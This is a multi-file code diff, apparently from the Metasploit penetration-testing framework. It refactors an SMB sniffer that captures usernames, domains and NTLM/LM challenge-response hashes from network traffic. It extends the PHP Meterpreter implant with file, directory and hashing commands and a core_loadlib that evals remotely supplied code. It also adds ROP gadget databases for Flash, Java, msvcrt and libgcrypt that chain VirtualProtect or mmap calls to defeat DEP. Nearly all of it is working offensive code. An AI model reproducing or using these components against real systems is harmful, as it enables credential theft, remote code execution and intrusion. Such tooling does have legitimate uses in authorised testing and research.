 				wordcount = payload[36,1].unpack("C")[0]
 				#negotiate response
@@ -54,128 +59,16 @@ class SnifferSMB < BaseProtocolParser
 					#the server challenge is here
 					if flags2 & 0x800 == 0
 						s[:challenge] = payload[73,8].unpack("H*")[0]
-						s[:last]  = :negotiate
+						s[:last]  = :smb1_negotiate
 					end
 				end
 
-			when :setupandx
-				payload = pkt.payload.dup
-
-				ntlmpayload = payload[/NTLMSSP\x00.*/m]
-				if ntlmpayload
-					ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
-					case ntlmmessagetype
-					when 2 # challenge
-						s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
-						s[:last] = :ntlm_type2
-					when 3 # auth
-						if s[:last] == :ntlm_type2
-							lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
-							lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
-							ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
-							ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
-							domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
-							domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
-							usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
-							usroffset = 	ntlmpayload[40, 2].unpack("v")[0]
-
-							s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
-							s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
-							s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
-							s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
-
-							secbloblength = payload[51,2].unpack("v")[0]
-							names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-							s[:peer_os]   = names[0] || ''
-							s[:peer_lm]   = names[1] || ''
-							s[:last] = :ntlm_type3
-						end
-					end
-				else
-					wordcount = payload[36,1].unpack("C")[0]
-					#authentification without smb extended security (smbmount, msf server capture)
-					if wordcount == 13 and s[:last]  == :negotiate
-						lmlength = 	payload[51,2].unpack("v")[0]
-						ntlmlength = 	payload[53,2].unpack("v")[0]
-						s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
-						s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
-						
-						names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-
-						s[:user] = names[0]
-						s[:domain]   = names[1]
-						s[:peer_os]   = names[2]
-						s[:peer_lm]   = names[3]
-						s[:last] = :smb_no_ntlm
-					else
-						#answer from server
-						if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
-							#do not output anonymous/guest logging
-							unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
-								#set lmhash to a default value if not provided						   	
-								s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
-								s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
-
-								smb_status = payload[9,4].unpack("V")[0]
-								if smb_status == 0 # success
-
-									ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
-
-									logmessage =
-										"#{ntlm_ver} Response Captured in session : #{s[:session]} \n" +
-										"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
-										"SERVER CHALLENGE:#{s[:challenge]} " + 
-										"\nLMHASH:#{s[:lmhash]} " + 
-										"\nNTHASH:#{s[:ntlmhash]}\n"
-									print_status(logmessage)
-
-									src_ip = s[:host]
-									dst_ip = s[:session].split("-")[1].split(":")[0]
-									# know this is ugly , last code added :-/
-									smb_db_type_hash = case ntlm_ver
-									       when "NTLMv1" 		then "smb_netv1_hash"
-									       when "NTLM2_SESSION" 	then "smb_netv1_hash"
-									       when "NTLMv2" 		then "smb_netv2_hash"
-									       end
-									# DB reporting
-									report_auth_info(
-										:host  => dst_ip,
-										:port => 445,
-										:sname => 'smb',
-										:user => s[:user],
-										:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
-										:type => smb_db_type_hash,
-										:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
-										:active => true
-									)
-
-									report_note(
-										:host  => src_ip,
-										:type  => "smb_peer_os",
-										:data  => s[:peer_os]
-									) if (s[:peer_os] and s[:peer_os].strip.length > 0)
-
-									report_note(
-										:host  => src_ip,
-										:type  => "smb_peer_lm",
-										:data  => s[:peer_lm]
-									) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
-
-									report_note(
-										:host  => src_ip,
-										:type  => "smb_domain",
-										:data  => s[:domain]
-									) if (s[:domain] and s[:domain].strip.length > 0)
-
-								end
-							end
-						end
-						s[:last] = nil
-						sessions.delete(s[:session])
-					end
-
-				end
-
+			when :smb1_setupandx
+				s[:smb_version]  = "SMBv1"
+				parse_sessionsetup(pkt, s)
+			when :smb2_setupandx
+				s[:smb_version]  = "SMBv2"
+				parse_sessionsetup(pkt, s)
 			when nil
 				# No matches, no saved state
 			else
@@ -197,6 +90,122 @@ class SnifferSMB < BaseProtocolParser
 		else
 			raise RuntimeError, "Unknow hash type"
 		end
+	end
 
+	def parse_sessionsetup(pkt, s)
+		payload = pkt.payload.dup
+		ntlmpayload = payload[/NTLMSSP\x00.*/m]
+		if ntlmpayload
+			ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
+			case ntlmmessagetype
+			when 2 # challenge
+				s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
+				s[:last] = :ntlm_type2
+			when 3 # auth
+				if s[:last] == :ntlm_type2
+					lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
+					lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
+					ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
+					ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
+					domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
+					domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
+					usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
+					usroffset = 	ntlmpayload[40, 2].unpack("v")[0]
+
+					s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
+					s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
+					s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
+					s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
+
+					secbloblength = payload[51,2].unpack("v")[0]
+					names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+					s[:peer_os]   = names[0] || ''
+					s[:peer_lm]   = names[1] || ''
+					s[:last] = :ntlm_type3
+				end
+			end
+		else
+			wordcount = payload[36,1].unpack("C")[0]
+			#authentification without smb extended security (smbmount, msf server capture)
+			if wordcount == 13 and s[:last]  == :smb1_negotiate and s[:smb_version]  == "SMBv1"
+				lmlength = 	payload[51,2].unpack("v")[0]
+				ntlmlength = 	payload[53,2].unpack("v")[0]
+				s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
+				s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
+			
+				names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+
+				s[:user] = names[0]
+				s[:domain]   = names[1]
+				s[:peer_os]   = names[2]
+				s[:peer_lm]   = names[3]
+				s[:last] = :smb_no_ntlm
+			else
+				#answer from server
+				if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
+					#do not output anonymous/guest logging
+					unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
+						#set lmhash to a default value if not provided						   	
+						s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
+						s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
+
+						smb_status = payload[9,4].unpack("V")[0]
+						if smb_status == 0 # success
+
+							ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
+
+							logmessage =
+								"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
+								"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
+								"SERVER CHALLENGE:#{s[:challenge]} " + 
+								"\nLMHASH:#{s[:lmhash]} " + 
+								"\nNTHASH:#{s[:ntlmhash]}\n"
+							print_status(logmessage)
+
+							src_ip = s[:client_host]
+							dst_ip = s[:host]
+							# know this is ugly , last code added :-/
+							smb_db_type_hash = case ntlm_ver
+							       when "NTLMv1" 		then "smb_netv1_hash"
+							       when "NTLM2_SESSION" 	then "smb_netv1_hash"
+							       when "NTLMv2" 		then "smb_netv2_hash"
+							       end
+							# DB reporting
+							report_auth_info(
+								:host  => dst_ip,
+								:port => 445,
+								:sname => 'smb',
+								:user => s[:user],
+								:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
+								:type => smb_db_type_hash,
+								:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
+								:active => true
+							)
+
+							report_note(
+								:host  => src_ip,
+								:type  => "smb_peer_os",
+								:data  => s[:peer_os]
+							) if (s[:peer_os] and s[:peer_os].strip.length > 0)
+
+							report_note(
+								:host  => src_ip,
+								:type  => "smb_peer_lm",
+								:data  => s[:peer_lm]
+							) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
+
+							report_note(
+								:host  => src_ip,
+								:type  => "smb_domain",
+								:data  => s[:domain]
+							) if (s[:domain] and s[:domain].strip.length > 0)
+
+						end
+					end
+				end
+				s[:last] = nil
+				sessions.delete(s[:session])
+			end
+		end
 	end
 end

data/meterpreter/ext_server_stdapi.php

@@ -283,6 +283,7 @@ function cononicalize_path($path) {
 # traditionally used this to get environment variables from the server.
 #
 if (!function_exists('stdapi_fs_file_expand_path')) {
+register_command('stdapi_fs_file_expand_path');
 function stdapi_fs_file_expand_path($req, &$pkt) {
     my_print("doing expand_path");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -320,8 +321,29 @@ function stdapi_fs_file_expand_path($req, &$pkt) {
 }
 }
 
+if (!function_exists('stdapi_fs_delete_dir')) {
+register_command('stdapi_fs_delete_dir');
+function stdapi_fs_delete_dir($req, &$pkt) {
+    my_print("doing rmdir");
+    $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
+    $ret = @rmdir(cononicalize_path($path_tlv['value']));
+    return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
+}
+}
+
+if (!function_exists('stdapi_fs_mkdir')) {
+register_command('stdapi_fs_mkdir');
+function stdapi_fs_mkdir($req, &$pkt) {
+    my_print("doing mkdir");
+    $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
+    $ret = @mkdir(cononicalize_path($path_tlv['value']));
+    return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
+}
+}
+
 # works
 if (!function_exists('stdapi_fs_chdir')) {
+register_command('stdapi_fs_chdir');
 function stdapi_fs_chdir($req, &$pkt) {
     my_print("doing chdir");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -332,6 +354,7 @@ function stdapi_fs_chdir($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_delete')) {
+register_command('stdapi_fs_delete');
 function stdapi_fs_delete($req, &$pkt) {
     my_print("doing delete");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@@ -342,6 +365,7 @@ function stdapi_fs_delete($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_getwd')) {
+register_command('stdapi_fs_getwd');
 function stdapi_fs_getwd($req, &$pkt) {
     my_print("doing pwd");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd()));
@@ -352,6 +376,7 @@ function stdapi_fs_getwd($req, &$pkt) {
 # works partially, need to get the path argument to mean the same thing as in
 # windows
 if (!function_exists('stdapi_fs_ls')) {
+register_command('stdapi_fs_ls');
 function stdapi_fs_ls($req, &$pkt) {
     my_print("doing ls");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@@ -392,6 +417,7 @@ function stdapi_fs_ls($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_separator')) {
+register_command('stdapi_fs_separator');
 function stdapi_fs_separator($req, &$pkt) {
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR));
     return ERROR_SUCCESS;
@@ -399,6 +425,7 @@ function stdapi_fs_separator($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_stat')) {
+register_command('stdapi_fs_stat');
 function stdapi_fs_stat($req, &$pkt) {
     my_print("doing stat");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -431,6 +458,7 @@ function stdapi_fs_stat($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_fs_delete_file')) {
+register_command('stdapi_fs_delete_file');
 function stdapi_fs_delete_file($req, &$pkt) {
     my_print("doing delete");
     $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@@ -446,6 +474,7 @@ function stdapi_fs_delete_file($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_fs_search')) {
+register_command('stdapi_fs_search');
 function stdapi_fs_search($req, &$pkt) {
     my_print("doing search");
 
@@ -483,10 +512,50 @@ function stdapi_fs_search($req, &$pkt) {
 }
 }
 
+
+if (!function_exists('stdapi_fs_md5')) {
+register_command("stdapi_fs_md5");
+function stdapi_fs_md5($req, &$pkt) {
+    $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
+    $path = cononicalize_path($path_tlv['value']);
+
+		if (is_callable("md5_file")) {
+			$md5 = md5_file($path);
+		} else {
+			$md5 = md5(file_get_contents($path));
+		}
+		$md5 = pack("H*", $md5);
+		# Ghetto abuse of file name type to indicate the md5 result
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
+    return ERROR_SUCCESS;
+}
+}
+
+
+if (!function_exists('stdapi_fs_sha1')) {
+register_command("stdapi_fs_sha1");
+function stdapi_fs_sha1($req, &$pkt) {
+    $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
+    $path = cononicalize_path($path_tlv['value']);
+
+		if (is_callable("sha1_file")) {
+			$sha1 = sha1_file($path);
+		} else {
+			$sha1 = sha1(file_get_contents($path));
+		}
+		$sha1 = pack("H*", $sha1);
+		# Ghetto abuse of file name type to indicate the sha1 result
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
+    return ERROR_SUCCESS;
+}
+}
+
+
 # Sys Config
 
 # works
 if (!function_exists('stdapi_sys_config_getuid')) {
+register_command('stdapi_sys_config_getuid');
 function stdapi_sys_config_getuid($req, &$pkt) {
     my_print("doing getuid");
     if (is_callable('posix_getuid')) {
@@ -505,15 +574,17 @@ function stdapi_sys_config_getuid($req, &$pkt) {
 }
 
 # Unimplemented becuase it's unimplementable
-if (!function_exists('stdapi_sys_config_rev2self')) {
-function stdapi_sys_config_rev2self($req, &$pkt) {
-    my_print("doing rev2self");
-    return ERROR_FAILURE;
-}
-}
+#if (!function_exists('stdapi_sys_config_rev2self')) {
+#register_command('stdapi_sys_config_rev2self');
+#function stdapi_sys_config_rev2self($req, &$pkt) {
+#    my_print("doing rev2self");
+#    return ERROR_FAILURE;
+#}
+#}
 
 # works
 if (!function_exists('stdapi_sys_config_sysinfo')) {
+register_command('stdapi_sys_config_sysinfo');
 function stdapi_sys_config_sysinfo($req, &$pkt) {
     my_print("doing sysinfo");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
@@ -526,6 +597,7 @@ function stdapi_sys_config_sysinfo($req, &$pkt) {
 $GLOBALS['processes'] = array();
 
 if (!function_exists('stdapi_sys_process_execute')) {
+register_command('stdapi_sys_process_execute');
 function stdapi_sys_process_execute($req, &$pkt) {
     global $channel_process_map, $processes;
 
@@ -600,6 +672,7 @@ function stdapi_sys_process_execute($req, &$pkt) {
 
 
 if (!function_exists('stdapi_sys_process_close')) {
+register_command('stdapi_sys_process_close');
 function stdapi_sys_process_close($req, &$pkt) {
     global $processes;
     my_print("doing process_close");
@@ -653,6 +726,7 @@ function close_process($proc) {
 # to decide what options to send to ps for portability and for information
 # usefulness.
 if (!function_exists('stdapi_sys_process_get_processes')) {
+register_command('stdapi_sys_process_get_processes');
 function stdapi_sys_process_get_processes($req, &$pkt) {
     my_print("doing get_processes");
     $list = array();
@@ -702,6 +776,7 @@ function stdapi_sys_process_get_processes($req, &$pkt) {
 
 # works
 if (!function_exists('stdapi_sys_process_getpid')) {
+register_command('stdapi_sys_process_getpid');
 function stdapi_sys_process_getpid($req, &$pkt) {
     my_print("doing getpid");
     packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid()));
@@ -710,6 +785,7 @@ function stdapi_sys_process_getpid($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_sys_process_kill')) {
+register_command('stdapi_sys_process_kill');
 function stdapi_sys_process_kill($req, &$pkt) {
     # The existence of posix_kill is unlikely (it's a php compile-time option
     # that isn't enabled by default, but better to try it and avoid shelling
@@ -740,6 +816,7 @@ function stdapi_sys_process_kill($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_net_socket_tcp_shutdown')) {
+register_command('stdapi_net_socket_tcp_shutdown');
 function stdapi_net_socket_tcp_shutdown($req, &$pkt) {
     my_print("doing stdapi_net_socket_tcp_shutdown");
     $cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
@@ -780,6 +857,9 @@ function deregister_registry_key($id) {
 
 
 if (!function_exists('stdapi_registry_create_key')) {
+if (is_windows() and is_callable('reg_open_key')) {
+  register_command('stdapi_registry_create_key');
+}
 function stdapi_registry_create_key($req, &$pkt) {
     my_print("doing stdapi_registry_create_key");
     if (is_windows() and is_callable('reg_open_key')) {
@@ -813,6 +893,9 @@ function stdapi_registry_create_key($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_registry_close_key')) {
+if (is_windows() and is_callable('reg_open_key')) {
+    register_command('stdapi_registry_close_key');
+}
 function stdapi_registry_close_key($req, &$pkt) {
     if (is_windows() and is_callable('reg_open_key')) {
         global $registry_handles;
@@ -831,6 +914,9 @@ function stdapi_registry_close_key($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_registry_query_value')) {
+if (is_windows() and is_callable('reg_open_key')) {
+  register_command('stdapi_registry_query_value');
+}
 function stdapi_registry_query_value($req, &$pkt) {
     if (is_windows() and is_callable('reg_open_key')) {
         global $registry_handles;
@@ -868,6 +954,9 @@ function stdapi_registry_query_value($req, &$pkt) {
 }
 
 if (!function_exists('stdapi_registry_set_value')) {
+if (is_windows() and is_callable('reg_open_key')) {
+    register_command('stdapi_registry_set_value');
+}
 function stdapi_registry_set_value($req, &$pkt) {
     if (is_windows() and is_callable('reg_open_key')) {
         global $registry_handles;

data/meterpreter/meterpreter.php

@@ -30,6 +30,18 @@ if (!isset($GLOBALS['readers'])) {
     $GLOBALS['readers'] = array();
 }
 
+# global list of extension commands
+if (!isset($GLOBALS['commands'])) {
+    $GLOBALS['commands'] = array("core_loadlib");
+}
+
+function register_command($c) {
+    global $commands;
+    if (! in_array($c, $commands)) {
+        array_push($commands, $c);
+    }
+}
+
 function my_print($str) {
     #error_log($str);
 }
@@ -389,14 +401,20 @@ function core_shutdown($req, &$pkt) {
 # isn't compressed before eval'ing it
 # TODO: check for zlib support and decompress if possible
 function core_loadlib($req, &$pkt) {
+    global $commands;
     my_print("doing core_loadlib");
     $data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
     if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
         return ERROR_FAILURE;
-    } else {
-        eval($data_tlv['value']);
-        return ERROR_SUCCESS;
     }
+    $tmp = $commands;
+    eval($data_tlv['value']);
+    $new = array_diff($commands, $tmp);
+    foreach ($new as $meth) {
+        packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, $meth));
+    }
+
+    return ERROR_SUCCESS;
 }
 
 

data/ropdb/flash.xml

@@ -0,0 +1,80 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>11.3.300.257</target>
+	</compatibility>
+
+	<gadgets base="0x10000000">
+		<gadget offset="0x00243043">POP EAX # RETN</gadget>
+		<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
+		<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
+		<gadget offset="0x002ed0f1">jmp esp</gadget>
+		<gadget offset="0x003eb988">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00662e60">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x0058289d">POP ECX # RETN</gadget>
+		<gadget offset="0x00955ebe">Writable location</gadget>
+		<gadget offset="0x00414e84">POP EDI # RETN</gadget>
+		<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0024044c">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x00627674">PUSHAD # RETN</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>11.3.300.265</target>
+	</compatibility>
+
+	<gadgets base="0x10000000">
+		<gadget offset="0x00487414">POP EAX # RETN</gadget>
+		<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
+		<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x000baf77">POP EBP # RETN</gadget>
+		<gadget offset="0x002d8d5c">jmp esp</gadget>
+		<gadget offset="0x00005604">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x004087db">POP ECX # RETN</gadget>
+		<gadget offset="0x00955197">Writable location</gadget>
+		<gadget offset="0x005be57f">POP EDI # RETN</gadget>
+		<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
+		<gadget offset="0x00244a82">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>11.3.300.268</target>
+	</compatibility>
+
+	<gadgets base="0x10000000">
+		<gadget offset="0x0012429b">POP ECX # RETN</gadget>
+		<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
+		<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
+		<gadget offset="0x002b95bb">jmp esp</gadget>
+		<gadget offset="0x0027f328">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x0017e345">POP ECX # RETN</gadget>
+		<gadget offset="0x0092027a">Writable location</gadget>
+		<gadget offset="0x002a394a">POP EDI # RETN</gadget>
+		<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
+		<gadget offset="0x002447d1">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
+	</gadgets>
+</rop>
+</db>

data/ropdb/java.xml

@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>*</target>
+	</compatibility>
+
+	<gadgets base="0x7c340000">
+		<gadget offset="0x0000252c">POP EBP # RETN</gadget>
+		<gadget offset="0x0000252c">skip 4 bytes</gadget>
+		<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00005249">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x000011c0">POP ECX # RETN</gadget>
+		<gadget offset="0x00051897">Writable location</gadget>
+		<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
+		<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
+		<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
+		<gadget offset="0x000015a2">JMP [EAX]</gadget>
+		<gadget offset="0x000362fb">POP EAX # RETN</gadget>
+		<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
+		<gadget offset="0x00005c30">ptr to 'push esp #  ret</gadget>
+	</gadgets>
+</rop>
+</db>

data/ropdb/msvcrt.xml

@@ -0,0 +1,56 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>WINDOWS XP SP2</target>
+		<target>WINDOWS XP SP3</target>
+	</compatibility>
+
+	<gadgets base="0x77c10000">
+		<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
+		<gadget offset="0x0002ee15">skip 4 bytes</gadget>
+		<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
+		<gadget offset="0x0004d9bb">Writable location</gadget>
+		<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
+		<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0002a184">POP ESI # RETN</gadget>
+		<gadget offset="0x0001aacc">JMP [EAX]</gadget>
+		<gadget offset="0x0002b860">POP EAX # RETN</gadget>
+		<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
+		<gadget offset="0x00025459">ptr to 'push esp #  ret</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>WINDOWS SERVER 2003 SP1</target>
+		<target>WINDOWS SERVER 2003 SP2</target>
+	</compatibility>
+
+	<gadgets base="0x77ba0000">
+		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
+		<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
+		<gadget value="junk">Filler</gadget>
+		<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
+		<gadget offset="0x00026320">POP EBP # RETN</gadget>
+		<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
+		<gadget offset="0x000385b7">POP EBX # RETN</gadget>
+		<gadget value="0x00000400">0x00000400-> ebx</gadget>
+		<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
+		<gadget value="0x00000040">0x00000040-> edx</gadget>
+		<gadget offset="0x000330fb">POP ECX # RETN</gadget>
+		<gadget offset="0x0004ff56">Writable location</gadget>
+		<gadget offset="0x00038a92">POP EDI # RETN</gadget>
+		<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
+		<gadget value="nop">nop</gadget>
+		<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
+	</gadgets>
+</rop>
+</db>

data/ropdb/samba.xml

@@ -0,0 +1,436 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+        <compatibility>
+            <target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
+	</compatibility>
+
+        <!--
+        dpkg -l|grep libgcrypt
+        ii  libgcrypt11                        1.4.5-2                      LGPL Crypto library - runtime library
+        b6977000-b69e8000 r-xp 00000000 08:01 160176     /usr/lib/libgcrypt.so.11.5.3
+        b69e8000-b69eb000 rw-p 00070000 08:01 160176     /usr/lib/libgcrypt.so.11.5.3
+        -->
+
+        <gadgets base="0">
+                <gadget offset="0x00004d44">pop ebx ; pop ebp ; ret</gadget>
+                <gadget offset="0x00071ad4">offset of .got.plt section</gadget>
+                <gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
+                <gadget offset="0x00063dbf">pop eax; ret</gadget>
+                <gadget offset="0x00071af4">mmap@got - 4</gadget>
+                <gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+                <gadget offset="0x00009974">jmp eax</gadget>
+                <gadget offset="0x00004d41">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
+                <gadget value ="0x00000000">mmap arg : addr</gadget>
+                <gadget value ="0x00001000">mmap arg : size</gadget>
+                <gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+                <gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
